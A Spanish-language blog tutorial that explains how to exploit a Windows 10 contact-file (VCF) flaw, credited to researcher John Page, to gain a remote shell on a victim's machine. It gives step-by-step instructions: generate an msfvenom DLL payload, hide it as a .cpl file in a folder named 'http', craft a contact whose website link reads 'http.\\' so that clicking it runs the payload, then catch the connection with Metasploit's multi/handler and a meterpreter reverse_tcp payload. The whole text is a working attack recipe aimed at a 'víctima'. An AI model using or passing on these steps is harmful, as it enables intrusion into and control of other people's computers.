Un enorme aplauso al investigador de seguridad cibernética John Page de traer esta vulnerabilidad al exploit-db el 15 de enero de 2019. Este fue un 0 day exploit y, por supuesto, funciona con el último Windows 10. Se clasifica en la vulnerabilidad “Ejecución de código remoto de advertencia de IU insuficiente“.
Tipo Vulnerabilidad:
1. Introducción a la ejecución remota de código
Básicamente, lo que John descubrió fue que si reemplazamos el sitio web en un archivo VCF con la ruta local de un archivo CPL, tiende a instalar ese archivo en lugar de abrirlo en el navegador.
Esto se hace reemplazando el “http://” por “http.\\“, que es totalmente insano, ya que un usuario necesitaría los ojos de varios mega píxeles para descubrir un error de ruta intencional de ese tipo. Entonces, todo lo que tenemos que hacer es enviar a la víctima el archivo VCF junto con nuestro archivo CPL en una carpeta llamada “http” (tiene que ser http solo para la inclusión de la ruta local) y obtendremos un shell.
Para leer más sobre la investigación sigue este enlace.
Metodología:
- Crear una carga útil de Windows msfvenom con extensión .dll.
- Enviar el archivo dll en una carpeta llamada “http“.
- Crear un archivo de contacto en la carpeta superior de “http“.
- Agreagar un sitio web en el contacto.
- Cambiar el prefijo del sitio web de http:// por http.\\
- Renombrar el archivo dll a “<nombre_sitio_web>.cpl“
- Ejecutar multi handler en Windows.
- Abrir la ruta del sitio web desde el archivo contacto.
- Iniciar una sesión de shell.
2. Prueba de concepto
El primer paso sería hacer una carga útil con una extensión dll. Para este propósito, estamos utilizando la carga útil de Windows de msfvenom, pero cualquier otra carga útil debería funcionar bien.
En este caso, mi dirección IP local es 192.168.1.61.
A continuación, transferimos esta carga útil a la máquina víctima en una nueva carpeta llamada http. Esto tiene que ser http y nada más, ya que incluiremos una ruta más adelante en el enlace del sitio web. Y tiene que estar en el directorio actual también. Así que copiamos este archivo shell.dll en la máquina víctima.
El siguiente y el paso más importante es hacer un archivo VCF de contacto. También puede descargar un vcf de muestra y agregar un sitio web, pero crearéun nuevo archivo de contacto. El sistema que usaré es Windows 10, por lo que la versión del archivo VCF puede diferir de la suya, pero igual funcionaría.
Agregue cualquier nombre en el archivo de contacto. (Agregué a Alexis Junior)
Pasa a la siguiente pestaña de Domicilio y verás un cuadro de texto para ingresar un sitio web. Agrega el nombre de cualquier sitio web como desees. Agregué el nombre de mi sitio web “esgeeks.com”, pero aquí viene lo más importante que debes tener en cuenta:
El enlace de un sitio web genérico es https://www.esgeeks.com pero modificamos un poco el prefijo reemplazando http:// por http.\\
Esto se debe a que en realidad no queremos incluir un sitio web, sino queremos incluir una ruta de acceso a nuestro archivo DLL para que cuando la víctima haga clic en el sitio web, nuestra DLL se ejecute.
A continuación, estaré fijando el enlace al sitio web con la extensión “.cpl“. Un archivo CPL es un elemento del panel de control, como Pantalla, Ratón, Sonido o Redes, utilizado por el sistema operativo Windows. (Tengo algo para ti: 200 Comandos para Ejecutar en Windows )
Guardar el contacto. Ahora cambia el nombre de la carga de shell.dll a “www.esgeeks.com.cpl”
Ahora estamos preparados y listos para ejecutar el archivo DLL, de modo que configuramos el multi/handler en una ventana de terminal y abrimos el contacto en la máquina de la víctima.
Tan pronto como hagamos clic en el enlace del sitio web, veremos que se obtiene una sesión en el terminal Kali Linux.
msfconsole
use exploit/multi/handler
set lhost 192.168.1.61
set lport 1234
set payload windows/meterpreter/reverse_tcp
exploit
Esto genera un shell del usuario actual de Windows que ha iniciado sesión.
3. Conclusión
Esta es una sorprendente vulnerabilidad descubierta por John Page y afecta a todas las versiones de trabajo de Windows que admiten archivos VCF de contacto. Como puedes ver, hemos generado un shell de Windows 10, es seguro decir que las versiones inferiores también se ven afectadas. ¡No olvides compartirlo en tus redes sociales! :’)
